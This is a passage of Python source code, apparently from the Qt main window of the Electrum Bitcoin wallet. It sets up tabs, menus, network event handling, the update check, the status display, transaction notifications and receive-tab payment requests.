self.contacts_tab, read_QIcon("tab_contacts.png"), _("Con&tacts"), "contacts") add_optional_tab(tabs, self.console_tab, read_QIcon("tab_console.png"), _("Con&sole"), "console") tabs.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Expanding) self.setCentralWidget(tabs) if self.config.get("is_maximized"): self.showMaximized() self.setWindowIcon(read_QIcon("electrum.png")) self.init_menubar() wrtabs = weakref.proxy(tabs) QShortcut(QKeySequence("Ctrl+W"), self, self.close) QShortcut(QKeySequence("Ctrl+Q"), self, self.close) QShortcut(QKeySequence("Ctrl+R"), self, self.update_wallet) QShortcut(QKeySequence("F5"), self, self.update_wallet) QShortcut(QKeySequence("Ctrl+PgUp"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() - 1)%wrtabs.count())) QShortcut(QKeySequence("Ctrl+PgDown"), self, lambda: wrtabs.setCurrentIndex((wrtabs.currentIndex() + 1)%wrtabs.count())) for i in range(wrtabs.count()): QShortcut(QKeySequence("Alt+" + str(i + 1)), self, lambda i=i: wrtabs.setCurrentIndex(i)) self.payment_request_ok_signal.connect(self.payment_request_ok) self.payment_request_error_signal.connect(self.payment_request_error) self.history_list.setFocus(True) # network callbacks if self.network: self.network_signal.connect(self.on_network_qt) interests = ['wallet_updated', 'network_updated', 'blockchain_updated', 'new_transaction', 'status', 'banner', 'verified', 'fee', 'fee_histogram'] # To avoid leaking references to "self" that prevent the # window from being GC-ed when closed, callbacks should be # methods of this class only, and specifically not be # partials, lambdas or methods of subobjects. Hence... self.network.register_callback(self.on_network, interests) # set initial message self.console.showMessage(self.network.banner) self.network.register_callback(self.on_quotes, ['on_quotes']) self.network.register_callback(self.on_history, ['on_history']) self.new_fx_quotes_signal.connect(self.on_fx_quotes) self.new_fx_history_signal.connect(self.on_fx_history) # update fee slider in case we missed the callback self.fee_slider.update() self.load_wallet(wallet) gui_object.timer.timeout.connect(self.timer_actions) self.fetch_alias() # If the option hasn't been set yet if config.get('check_updates') is None: choice = self.question(title="Electrum - " + _("Enable update check"), msg=_("For security reasons we advise that you always use the latest version of Electrum.") + " " + _("Would you like to be notified when there is a newer version of Electrum available?")) config.set_key('check_updates', bool(choice), save=True) if config.get('check_updates', False): # The references to both the thread and the window need to be stored somewhere # to prevent GC from getting in our way. 
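            # (Editor's aside, a hedged note on the pattern above: if the thread
            #  were started as a bare local, e.g. "UpdateCheckThread(self).start()"
            #  with no reference kept, the Python-side QThread wrapper could be
            #  garbage-collected while the version check is still running -- hence
            #  the "self._update_check_thread" attribute assigned below.)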
def on_version_received(v): if UpdateCheck.is_newer(v): self.update_check_button.setText(_("Update to Electrum {} is available").format(v)) self.update_check_button.clicked.connect(lambda: self.show_update_check(v)) self.update_check_button.show() self._update_check_thread = UpdateCheckThread(self) self._update_check_thread.checked.connect(on_version_received) self._update_check_thread.start() def on_history(self, b): self.wallet.clear_coin_price_cache() self.new_fx_history_signal.emit() def setup_exception_hook(self): Exception_Hook(self) def on_fx_history(self): self.history_model.refresh('fx_history') self.address_list.update() def on_quotes(self, b): self.new_fx_quotes_signal.emit() def on_fx_quotes(self): self.update_status() # Refresh edits with the new rate edit = self.fiat_send_e if self.fiat_send_e.is_last_edited else self.amount_e edit.textEdited.emit(edit.text()) edit = self.fiat_receive_e if self.fiat_receive_e.is_last_edited else self.receive_amount_e edit.textEdited.emit(edit.text()) # History tab needs updating if it used spot if self.fx.history_used_spot: self.history_model.refresh('fx_quotes') self.address_list.update() def toggle_tab(self, tab): show = not self.config.get('show_{}_tab'.format(tab.tab_name), False) self.config.set_key('show_{}_tab'.format(tab.tab_name), show) item_text = (_("Hide {}") if show else _("Show {}")).format(tab.tab_description) tab.menu_action.setText(item_text) if show: # Find out where to place the tab index = len(self.tabs) for i in range(len(self.tabs)): try: if tab.tab_pos < self.tabs.widget(i).tab_pos: index = i break except AttributeError: pass self.tabs.insertTab(index, tab, tab.tab_icon, tab.tab_description.replace("&", "")) else: i = self.tabs.indexOf(tab) self.tabs.removeTab(i) def push_top_level_window(self, window): '''Used for e.g. tx dialog box to ensure new dialogs are appropriately parented. 
This used to be done by explicitly providing the parent window, but that isn't something hardware wallet prompts know.''' self.tl_windows.append(window) def pop_top_level_window(self, window): self.tl_windows.remove(window) def top_level_window(self, test_func=None): '''Do the right thing in the presence of tx dialog windows''' override = self.tl_windows[-1] if self.tl_windows else None if override and test_func and not test_func(override): override = None # only override if ok for test_func return self.top_level_window_recurse(override, test_func) def diagnostic_name(self): #return '{}:{}'.format(self.__class__.__name__, self.wallet.diagnostic_name()) return self.wallet.diagnostic_name() def is_hidden(self): return self.isMinimized() or self.isHidden() def show_or_hide(self): if self.is_hidden(): self.bring_to_top() else: self.hide() def bring_to_top(self): self.show() self.raise_() def on_error(self, exc_info): e = exc_info[1] if isinstance(e, UserCancelled): pass elif isinstance(e, UserFacingException): self.show_error(str(e)) else: try: self.logger.error("on_error", exc_info=exc_info) except OSError: pass # see #4418 self.show_error(str(e)) def on_network(self, event, *args): if event == 'wallet_updated': wallet = args[0] if wallet == self.wallet: self.need_update.set() elif event == 'network_updated': self.gui_object.network_updated_signal_obj.network_updated_signal \ .emit(event, args) self.network_signal.emit('status', None) elif event == 'blockchain_updated': # to update number of confirmations in history self.need_update.set() elif event == 'new_transaction': wallet, tx = args if wallet == self.wallet: self.tx_notification_queue.put(tx) elif event in ['status', 'banner', 'verified', 'fee', 'fee_histogram']: # Handle in GUI thread self.network_signal.emit(event, args) else: self.logger.info(f"unexpected network message: {event} {args}") def on_network_qt(self, event, args=None): # Handle a network message in the GUI thread if event == 'status': self.update_status() elif event == 'banner': self.console.showMessage(args[0]) elif event == 'verified': wallet, tx_hash, tx_mined_status = args if wallet == self.wallet: self.history_model.update_tx_mined_status(tx_hash, tx_mined_status) elif event == 'fee': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True elif event == 'fee_histogram': if self.config.is_dynfee(): self.fee_slider.update() self.require_fee_update = True self.history_model.on_fee_histogram() else: self.logger.info(f"unexpected network_qt signal: {event} {args}") def fetch_alias(self): self.alias_info = None alias = self.config.get('alias') if alias: alias = str(alias) def f(): self.alias_info = self.contacts.resolve_openalias(alias) self.alias_received_signal.emit() t = threading.Thread(target=f) t.setDaemon(True) t.start() def close_wallet(self): if self.wallet: self.logger.info(f'close_wallet {self.wallet.storage.path}') run_hook('close_wallet', self.wallet) @profiler def load_wallet(self, wallet): wallet.thread = TaskThread(self, self.on_error) self.update_recently_visited(wallet.storage.path) self.need_update.set() # Once GUI has been initialized check if we want to announce something since the callback has been called before the GUI was initialized # update menus self.seed_menu.setEnabled(self.wallet.has_seed()) self.update_lock_icon() self.update_buttons_on_seed() self.update_console() self.clear_receive_tab() self.request_list.update() self.tabs.show() self.init_geometry() if self.config.get('hide_gui') and 
self.gui_object.tray.isVisible(): self.hide() else: self.show() self.watching_only_changed() run_hook('load_wallet', wallet, self) try: wallet.try_detecting_internal_addresses_corruption() except InternalAddressCorruption as e: self.show_error(str(e)) send_exception_to_crash_reporter(e) def init_geometry(self): winpos = self.wallet.storage.get("winpos-qt") try: screen = self.app.desktop().screenGeometry() assert screen.contains(QRect(*winpos)) self.setGeometry(*winpos) except: self.logger.info("using default geometry") self.setGeometry(100, 100, 840, 400) def watching_only_changed(self): name = "Electrum Testnet" if constants.net.TESTNET else "Electrum" title = '%s %s - %s' % (name, ELECTRUM_VERSION, self.wallet.basename()) extra = [self.wallet.storage.get('wallet_type', '?')] if self.wallet.is_watching_only(): extra.append(_('watching only')) title += ' [%s]'% ', '.join(extra) self.setWindowTitle(title) self.password_menu.setEnabled(self.wallet.may_have_password()) self.import_privkey_menu.setVisible(self.wallet.can_import_privkey()) self.import_address_menu.setVisible(self.wallet.can_import_address()) self.export_menu.setEnabled(self.wallet.can_export()) def warn_if_watching_only(self): if self.wallet.is_watching_only(): msg = ' '.join([ _("This wallet is watching-only."), _("This means you will not be able to spend Bitcoins with it."), _("Make sure you own the seed phrase or the private keys, before you request Bitcoins to be sent to this wallet.") ]) self.show_warning(msg, title=_('Watch-only wallet')) def warn_if_testnet(self): if not constants.net.TESTNET: return # user might have opted out already if self.config.get('dont_show_testnet_warning', False): return # only show once per process lifecycle if getattr(self.gui_object, '_warned_testnet', False): return self.gui_object._warned_testnet = True msg = ''.join([ _("You are in testnet mode."), ' ', _("Testnet coins are worthless."), '\n', _("Testnet is separate from the main Bitcoin network. 
It is used for testing.") ]) cb = QCheckBox(_("Don't show this again.")) cb_checked = False def on_cb(x): nonlocal cb_checked cb_checked = x == Qt.Checked cb.stateChanged.connect(on_cb) self.show_warning(msg, title=_('Testnet'), checkbox=cb) if cb_checked: self.config.set_key('dont_show_testnet_warning', True) def open_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder) if not filename: return self.gui_object.new_window(filename) def backup_wallet(self): path = self.wallet.storage.path wallet_folder = os.path.dirname(path) filename, __ = QFileDialog.getSaveFileName(self, _('Enter a filename for the copy of your wallet'), wallet_folder) if not filename: return new_path = os.path.join(wallet_folder, filename) if new_path != path: try: shutil.copy2(path, new_path) self.show_message(_("A copy of your wallet file was created in")+" '%s'" % str(new_path), title=_("Wallet backup created")) except BaseException as reason: self.show_critical(_("Electrum was unable to copy your wallet file to the specified location.") + "\n" + str(reason), title=_("Unable to create backup")) def update_recently_visited(self, filename): recent = self.config.get('recently_open', []) try: sorted(recent) except: recent = [] if filename in recent: recent.remove(filename) recent.insert(0, filename) recent = [path for path in recent if os.path.exists(path)] recent = recent[:5] self.config.set_key('recently_open', recent) self.recently_visited_menu.clear() for i, k in enumerate(sorted(recent)): b = os.path.basename(k) def loader(k): return lambda: self.gui_object.new_window(k) self.recently_visited_menu.addAction(b, loader(k)).setShortcut(QKeySequence("Ctrl+%d"%(i+1))) self.recently_visited_menu.setEnabled(len(recent)) def get_wallet_folder(self): return os.path.dirname(os.path.abspath(self.config.get_wallet_path())) def new_wallet(self): try: wallet_folder = self.get_wallet_folder() except FileNotFoundError as e: self.show_error(str(e)) return filename = get_new_wallet_name(wallet_folder) full_path = os.path.join(wallet_folder, filename) self.gui_object.start_new_window(full_path, None) def init_menubar(self): menubar = QMenuBar() file_menu = menubar.addMenu(_("&File")) self.recently_visited_menu = file_menu.addMenu(_("&Recently open")) file_menu.addAction(_("&Open"), self.open_wallet).setShortcut(QKeySequence.Open) file_menu.addAction(_("&New/Restore"), self.new_wallet).setShortcut(QKeySequence.New) file_menu.addAction(_("&Save Copy"), self.backup_wallet).setShortcut(QKeySequence.SaveAs) file_menu.addAction(_("Delete"), self.remove_wallet) file_menu.addSeparator() file_menu.addAction(_("&Quit"), self.close) wallet_menu = menubar.addMenu(_("&Wallet")) wallet_menu.addAction(_("&Information"), self.show_master_public_keys) wallet_menu.addSeparator() self.password_menu = wallet_menu.addAction(_("&Password"), self.change_password_dialog) self.seed_menu = wallet_menu.addAction(_("&Seed"), self.show_seed_dialog) self.private_keys_menu = wallet_menu.addMenu(_("&Private keys")) self.private_keys_menu.addAction(_("&Sweep"), self.sweep_key_dialog) self.import_privkey_menu = self.private_keys_menu.addAction(_("&Import"), self.do_import_privkey) self.export_menu = self.private_keys_menu.addAction(_("&Export"), self.export_privkeys_dialog) self.import_address_menu = wallet_menu.addAction(_("Import addresses"), self.import_addresses) wallet_menu.addSeparator() addresses_menu = 
wallet_menu.addMenu(_("&Addresses")) addresses_menu.addAction(_("&Filter"), lambda: self.address_list.toggle_toolbar(self.config)) labels_menu = wallet_menu.addMenu(_("&Labels")) labels_menu.addAction(_("&Import"), self.do_import_labels) labels_menu.addAction(_("&Export"), self.do_export_labels) history_menu = wallet_menu.addMenu(_("&History")) history_menu.addAction(_("&Filter"), lambda: self.history_list.toggle_toolbar(self.config)) history_menu.addAction(_("&Summary"), self.history_list.show_summary) history_menu.addAction(_("&Plot"), self.history_list.plot_history_dialog) history_menu.addAction(_("&Export"), self.history_list.export_history_dialog) contacts_menu = wallet_menu.addMenu(_("Contacts")) contacts_menu.addAction(_("&New"), self.new_contact_dialog) contacts_menu.addAction(_("Import"), lambda: self.contact_list.import_contacts()) contacts_menu.addAction(_("Export"), lambda: self.contact_list.export_contacts()) invoices_menu = wallet_menu.addMenu(_("Invoices")) invoices_menu.addAction(_("Import"), lambda: self.invoice_list.import_invoices()) invoices_menu.addAction(_("Export"), lambda: self.invoice_list.export_invoices()) wallet_menu.addSeparator() wallet_menu.addAction(_("Find"), self.toggle_search).setShortcut(QKeySequence("Ctrl+F")) def add_toggle_action(view_menu, tab): is_shown = self.config.get('show_{}_tab'.format(tab.tab_name), False) item_name = (_("Hide") if is_shown else _("Show")) + " " + tab.tab_description tab.menu_action = view_menu.addAction(item_name, lambda: self.toggle_tab(tab)) view_menu = menubar.addMenu(_("&View")) add_toggle_action(view_menu, self.addresses_tab) add_toggle_action(view_menu, self.utxo_tab) add_toggle_action(view_menu, self.contacts_tab) add_toggle_action(view_menu, self.console_tab) tools_menu = menubar.addMenu(_("&Tools")) # Settings / Preferences are all reserved keywords in macOS using this as work around tools_menu.addAction(_("Electrum preferences") if sys.platform == 'darwin' else _("Preferences"), self.settings_dialog) tools_menu.addAction(_("&Network"), lambda: self.gui_object.show_network_dialog(self)) tools_menu.addAction(_("&Plugins"), self.plugins_dialog) tools_menu.addSeparator() tools_menu.addAction(_("&Sign/verify message"), self.sign_verify_message) tools_menu.addAction(_("&Encrypt/decrypt message"), self.encrypt_message) tools_menu.addSeparator() paytomany_menu = tools_menu.addAction(_("&Pay to many"), self.paytomany) raw_transaction_menu = tools_menu.addMenu(_("&Load transaction")) raw_transaction_menu.addAction(_("&From file"), self.do_process_from_file) raw_transaction_menu.addAction(_("&From text"), self.do_process_from_text) raw_transaction_menu.addAction(_("&From the blockchain"), self.do_process_from_txid) raw_transaction_menu.addAction(_("&From QR code"), self.read_tx_from_qrcode) self.raw_transaction_menu = raw_transaction_menu run_hook('init_menubar_tools', self, tools_menu) help_menu = menubar.addMenu(_("&Help")) help_menu.addAction(_("&About"), self.show_about) help_menu.addAction(_("&Check for updates"), self.show_update_check) help_menu.addAction(_("&Official website"), lambda: webbrowser.open("https://electrum.org")) help_menu.addSeparator() help_menu.addAction(_("&Documentation"), lambda: webbrowser.open("http://docs.electrum.org/")).setShortcut(QKeySequence.HelpContents) help_menu.addAction(_("&Report Bug"), self.show_report_bug) help_menu.addSeparator() help_menu.addAction(_("&Donate to server"), self.donate_to_server) self.setMenuBar(menubar) def donate_to_server(self): d = 
self.network.get_donation_address() if d: host = self.network.get_parameters().host self.pay_to_URI('bitcoin:%s?message=donation for %s'%(d, host)) else: self.show_error(_('No donation address for this server')) def show_about(self): QMessageBox.about(self, "Electrum", (_("Version")+" %s" % ELECTRUM_VERSION + "\n\n" + _("Electrum's focus is speed, with low resource usage and simplifying Bitcoin.") + " " + _("You do not need to perform regular backups, because your wallet can be " "recovered from a secret phrase that you can memorize or write on paper.") + " " + _("Startup times are instant because it operates in conjunction with high-performance " "servers that handle the most complicated parts of the Bitcoin system.") + "\n\n" + _("Uses icons from the Icons8 icon pack (icons8.com)."))) def show_update_check(self, version=None): self.gui_object._update_check = UpdateCheck(self, version) def show_report_bug(self): msg = ' '.join([ _("Please report any bugs as issues on github:<br/>"), "<a href=\"https://github.com/spesmilo/electrum/issues\">https://github.com/spesmilo/electrum/issues</a><br/><br/>", _("Before reporting a bug, upgrade to the most recent version of Electrum (latest release or git HEAD), and include the version number in your report."), _("Try to explain not only what the bug is, but how it occurs.") ]) self.show_message(msg, title="Electrum - " + _("Reporting Bugs"), rich_text=True) def notify_transactions(self): if self.tx_notification_queue.qsize() == 0: return if not self.wallet.up_to_date: return # no notifications while syncing now = time.time() rate_limit = 20 # seconds if self.tx_notification_last_time + rate_limit > now: return self.tx_notification_last_time = now self.logger.info("Notifying GUI about new transactions") txns = [] while True: try: txns.append(self.tx_notification_queue.get_nowait()) except queue.Empty: break # Combine the transactions if there are at least three if len(txns) >= 3: total_amount = 0 for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue total_amount += v self.notify(_("{} new transactions: Total amount received in the new transactions {}") .format(len(txns), self.format_amount_and_units(total_amount))) else: for tx in txns: is_relevant, is_mine, v, fee = self.wallet.get_wallet_delta(tx) if not is_relevant: continue self.notify(_("New transaction: {}").format(self.format_amount_and_units(v))) def notify(self, message): if self.tray: try: # this requires Qt 5.9 self.tray.showMessage("Electrum", message, read_QIcon("electrum_dark_icon"), 20000) except TypeError: self.tray.showMessage("Electrum", message, QSystemTrayIcon.Information, 20000) # custom wrappers for getOpenFileName and getSaveFileName, that remember the path selected by the user def getOpenFileName(self, title, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) fileName, __ = QFileDialog.getOpenFileName(self, title, directory, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def getSaveFileName(self, title, filename, filter = ""): directory = self.config.get('io_dir', os.path.expanduser('~')) path = os.path.join( directory, filename ) fileName, __ = QFileDialog.getSaveFileName(self, title, path, filter) if fileName and directory != os.path.dirname(fileName): self.config.set_key('io_dir', os.path.dirname(fileName), True) return fileName def timer_actions(self): # Note this runs in the GUI thread if 
self.need_update.is_set(): self.need_update.clear() self.update_wallet() elif not self.wallet.up_to_date: # this updates "synchronizing" progress self.update_status() # resolve aliases # FIXME this is a blocking network call that has a timeout of 5 sec self.payto_e.resolve() # update fee if self.require_fee_update: self.do_update_fee() self.require_fee_update = False self.notify_transactions() def format_amount(self, x, is_diff=False, whitespaces=False): return format_satoshis(x, self.num_zeros, self.decimal_point, is_diff=is_diff, whitespaces=whitespaces) def format_amount_and_units(self, amount): text = self.format_amount(amount) + ' '+ self.base_unit() x = self.fx.format_amount_and_units(amount) if self.fx else None if text and x: text += ' (%s)'%x return text def format_fee_rate(self, fee_rate): # fee_rate is in sat/kB return format_fee_satoshis(fee_rate/1000, num_zeros=self.num_zeros) + ' sat/byte' def get_decimal_point(self): return self.decimal_point def base_unit(self): return decimal_point_to_base_unit_name(self.decimal_point) def connect_fields(self, window, btc_e, fiat_e, fee_e): def edit_changed(edit): if edit.follows: return edit.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet()) fiat_e.is_last_edited = (edit == fiat_e) amount = edit.get_amount() rate = self.fx.exchange_rate() if self.fx else Decimal('NaN') if rate.is_nan() or amount is None: if edit is fiat_e: btc_e.setText("") if fee_e: fee_e.setText("") else: fiat_e.setText("") else: if edit is fiat_e: btc_e.follows = True btc_e.setAmount(int(amount / Decimal(rate) * COIN)) btc_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) btc_e.follows = False if fee_e: window.update_fee() else: fiat_e.follows = True fiat_e.setText(self.fx.ccy_amount_str( amount * Decimal(rate) / COIN, False)) fiat_e.setStyleSheet(ColorScheme.BLUE.as_stylesheet()) fiat_e.follows = False btc_e.follows = False fiat_e.follows = False fiat_e.textChanged.connect(partial(edit_changed, fiat_e)) btc_e.textChanged.connect(partial(edit_changed, btc_e)) fiat_e.is_last_edited = False def update_status(self): if not self.wallet: return if self.network is None: text = _("Offline") icon = read_QIcon("status_disconnected.png") elif self.network.is_connected(): server_height = self.network.get_server_height() server_lag = self.network.get_local_height() - server_height fork_str = "_fork" if len(self.network.get_blockchains())>1 else "" # Server height can be 0 after switching to a new server # until we get a headers subscription request response. # Display the synchronizing message in that case. 
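            # (Editor's aside: handling server_height == 0 in this first branch
            #  matters for ordering -- otherwise server_lag would equal the full
            #  local height and the "Server is lagging" branch below would report
            #  a bogus, very large lag right after switching servers.)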
if not self.wallet.up_to_date or server_height == 0: num_sent, num_answered = self.wallet.get_history_sync_state_details() text = ("{} ({}/{})" .format(_("Synchronizing..."), num_answered, num_sent)) icon = read_QIcon("status_waiting.png") elif server_lag > 1: text = _("Server is lagging ({} blocks)").format(server_lag) icon = read_QIcon("status_lagging%s.png"%fork_str) else: c, u, x = self.wallet.get_balance() text = _("Balance" ) + ": %s "%(self.format_amount_and_units(c)) if u: text += " [%s unconfirmed]"%(self.format_amount(u, is_diff=True).strip()) if x: text += " [%s unmatured]"%(self.format_amount(x, is_diff=True).strip()) # append fiat balance and price if self.fx.is_enabled(): text += self.fx.get_fiat_status_text(c + u + x, self.base_unit(), self.get_decimal_point()) or '' if not self.network.proxy: icon = read_QIcon("status_connected%s.png"%fork_str) else: icon = read_QIcon("status_connected_proxy%s.png"%fork_str) else: if self.network.proxy: text = "{} ({})".format(_("Not connected"), _("proxy enabled")) else: text = _("Not connected") icon = read_QIcon("status_disconnected.png") self.tray.setToolTip("%s (%s)" % (text, self.wallet.basename())) self.balance_label.setText(text) self.status_button.setIcon( icon ) def update_wallet(self): self.update_status() if self.wallet.up_to_date or not self.network or not self.network.is_connected(): self.update_tabs() def update_tabs(self, wallet=None): if wallet is None: wallet = self.wallet if wallet != self.wallet: return self.history_model.refresh('update_tabs') self.request_list.update() self.address_list.update() self.utxo_list.update() self.contact_list.update() self.invoice_list.update() self.update_completions() def create_history_tab(self): self.history_model = HistoryModel(self) self.history_list = l = HistoryList(self, self.history_model) self.history_model.set_view(self.history_list) l.searchable_list = l toolbar = l.create_toolbar(self.config) toolbar_shown = self.config.get('show_toolbar_history', False) l.show_toolbar(toolbar_shown) return self.create_list_tab(l, toolbar) def show_address(self, addr): from . import address_dialog d = address_dialog.AddressDialog(self, addr) d.exec_() def show_transaction(self, tx, tx_desc = None): '''tx_desc is set only for txs created in the Send tab''' show_transaction(tx, self, tx_desc) def create_receive_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.receive_grid = grid = QGridLayout() grid.setSpacing(8) grid.setColumnStretch(3, 1) self.receive_address_e = ButtonsLineEdit() self.receive_address_e.addCopyButton(self.app) self.receive_address_e.setReadOnly(True) msg = _('Bitcoin address where the payment should be received. 
Note that each payment request uses a different Bitcoin address.') self.receive_address_label = HelpLabel(_('Receiving address'), msg) self.receive_address_e.textChanged.connect(self.update_receive_qr) self.receive_address_e.textChanged.connect(self.update_receive_address_styling) self.receive_address_e.setFocusPolicy(Qt.ClickFocus) grid.addWidget(self.receive_address_label, 0, 0) grid.addWidget(self.receive_address_e, 0, 1, 1, -1) self.receive_message_e = QLineEdit() grid.addWidget(QLabel(_('Description')), 1, 0) grid.addWidget(self.receive_message_e, 1, 1, 1, -1) self.receive_message_e.textChanged.connect(self.update_receive_qr) self.receive_amount_e = BTCAmountEdit(self.get_decimal_point) grid.addWidget(QLabel(_('Requested amount')), 2, 0) grid.addWidget(self.receive_amount_e, 2, 1) self.receive_amount_e.textChanged.connect(self.update_receive_qr) self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '') if not self.fx or not self.fx.is_enabled(): self.fiat_receive_e.setVisible(False) grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft) self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None) self.expires_combo = QComboBox() self.expires_combo.addItems([i[0] for i in expiration_values]) self.expires_combo.setCurrentIndex(3) self.expires_combo.setFixedWidth(self.receive_amount_e.width()) msg = ' '.join([ _('Expiration date of your request.'), _('This information is seen by the recipient if you send them a signed payment request.'), _('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'), _('The bitcoin address never expires and will always be part of this electrum wallet.'), ]) grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0) grid.addWidget(self.expires_combo, 3, 1) self.expires_label = QLineEdit('') self.expires_label.setReadOnly(1) self.expires_label.setFocusPolicy(Qt.NoFocus) self.expires_label.hide() grid.addWidget(self.expires_label, 3, 1) self.save_request_button = QPushButton(_('Save')) self.save_request_button.clicked.connect(self.save_payment_request) self.new_request_button = QPushButton(_('New')) self.new_request_button.clicked.connect(self.new_payment_request) self.receive_qr = QRCodeWidget(fixedSize=200) self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window() self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor)) self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor)) self.receive_buttons = buttons = QHBoxLayout() buttons.addStretch(1) buttons.addWidget(self.save_request_button) buttons.addWidget(self.new_request_button) grid.addLayout(buttons, 4, 1, 1, 2) self.receive_requests_label = QLabel(_('Requests')) from .request_list import RequestList self.request_list = RequestList(self) # layout vbox_g = QVBoxLayout() vbox_g.addLayout(grid) vbox_g.addStretch() hbox = QHBoxLayout() hbox.addLayout(vbox_g) hbox.addWidget(self.receive_qr) w = QWidget() w.searchable_list = self.request_list vbox = QVBoxLayout(w) vbox.addLayout(hbox) vbox.addStretch(1) vbox.addWidget(self.receive_requests_label) vbox.addWidget(self.request_list) vbox.setStretchFactor(self.request_list, 1000) return w def delete_payment_request(self, addr): self.wallet.remove_payment_request(addr, self.config) self.request_list.update() self.clear_receive_tab() def get_request_URI(self, addr): req = self.wallet.receive_requests[addr] message = self.wallet.labels.get(addr, '') amount = req['amount'] extra_query_params = 
{} if req.get('time'): extra_query_params['time'] = str(int(req.get('time'))) if req.get('exp'): extra_query_params['exp'] = str(int(req.get('exp'))) if req.get('name') and req.get('sig'): sig = bfh(req.get('sig')) sig = bitcoin.base_encode(sig, base=58) extra_query_params['name'] = req['name'] extra_query_params['sig'] = sig uri = util.create_bip21_uri(addr, amount, message, extra_query_params=extra_query_params) return str(uri) def sign_payment_request(self, addr): alias = self.config.get('alias') alias_privkey = None if alias and self.alias_info: alias_addr, alias_name, validated = self.alias_info if alias_addr: if self.wallet.is_mine(alias_addr): msg = _('This payment request will be signed.') + '\n' + _('Please enter your password') password = None if self.wallet.has_keystore_encryption(): password = self.password_dialog(msg) if not password: return try: self.wallet.sign_payment_request(addr, alias, alias_addr, password) except Exception as e: self.show_error(str(e)) return else: return def save_payment_request(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() if not message and not amount: self.show_error(_('No message or amount')) return False i = self.expires_combo.currentIndex() expiration = list(map(lambda x: x[1], expiration_values))[i] req = self.wallet.make_payment_request(addr, amount, message, expiration) try: self.wallet.add_payment_request(req, self.config) except Exception as e: self.logger.exception('Error adding payment request') self.show_error(_('Error adding payment request') + ':\n' + str(e)) else: self.sign_payment_request(addr) self.save_request_button.setEnabled(False) finally: self.request_list.update() self.address_list.update() def view_and_paste(self, title, msg, data): dialog = WindowModalDialog(self, title) vbox = QVBoxLayout() label = QLabel(msg) label.setWordWrap(True) vbox.addWidget(label) pr_e = ShowQRTextEdit(text=data) vbox.addWidget(pr_e) vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog))) dialog.setLayout(vbox) dialog.exec_() def export_payment_request(self, addr): r = self.wallet.receive_requests.get(addr) pr = paymentrequest.serialize_request(r).SerializeToString() name = r['id'] + '.bip70' fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70") if fileName: with open(fileName, "wb+") as f: f.write(util.to_bytes(pr)) self.show_message(_("Request saved successfully")) self.saved = True def new_payment_request(self): addr = self.wallet.get_unused_address() if addr is None: if not self.wallet.is_deterministic(): msg = [ _('No more addresses in your wallet.'), _('You are using a non-deterministic wallet, which cannot create new addresses.'), _('If you want to create new addresses, use a deterministic wallet instead.') ] self.show_message(' '.join(msg)) return if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. 
To avoid this situation, use the existing addresses first.\n\nCreate anyway?")): return addr = self.wallet.create_new_address(False) self.set_receive_address(addr) self.expires_label.hide() self.expires_combo.show() self.new_request_button.setEnabled(False) self.receive_message_e.setFocus(1) def set_receive_address(self, addr): self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) def clear_receive_tab(self): try: addr = self.wallet.get_receiving_address() or '' except InternalAddressCorruption as e: self.show_error(str(e)) addr = '' self.receive_address_e.setText(addr) self.receive_message_e.setText('') self.receive_amount_e.setAmount(None) self.expires_label.hide() self.expires_combo.show() def toggle_qr_window(self): from . import qrwindow if not self.qr_window: self.qr_window = qrwindow.QR_Window(self) self.qr_window.setVisible(True) self.qr_window_geometry = self.qr_window.geometry() else: if not self.qr_window.isVisible(): self.qr_window.setVisible(True) self.qr_window.setGeometry(self.qr_window_geometry) else: self.qr_window_geometry = self.qr_window.geometry() self.qr_window.setVisible(False) self.update_receive_qr() def show_send_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab)) def show_receive_tab(self): self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab)) def receive_at(self, addr): if not bitcoin.is_address(addr): return self.show_receive_tab() self.receive_address_e.setText(addr) self.new_request_button.setEnabled(True) def update_receive_qr(self): addr = str(self.receive_address_e.text()) amount = self.receive_amount_e.get_amount() message = self.receive_message_e.text() self.save_request_button.setEnabled((amount is not None) or (message != "")) uri = util.create_bip21_uri(addr, amount, message) self.receive_qr.setData(uri) if self.qr_window and self.qr_window.isVisible(): self.qr_window.qrw.setData(uri) def update_receive_address_styling(self): addr = str(self.receive_address_e.text()) if self.wallet.is_used(addr): self.receive_address_e.setStyleSheet(ColorScheme.RED.as_stylesheet(True)) self.receive_address_e.setToolTip(_("This address has already been used. " "For better privacy, do not reuse it for new payments.")) else: self.receive_address_e.setStyleSheet("") self.receive_address_e.setToolTip("") def set_feerounding_text(self, num_satoshis_added): self.feerounding_text = (_('Additional {} satoshis are going to be added.') .format(num_satoshis_added)) def create_send_tab(self): # A 4-column grid layout. All the stretch is in the last column. # The exchange rate plugin adds a fiat widget in column 2 self.send_grid = grid = QGridLayout() 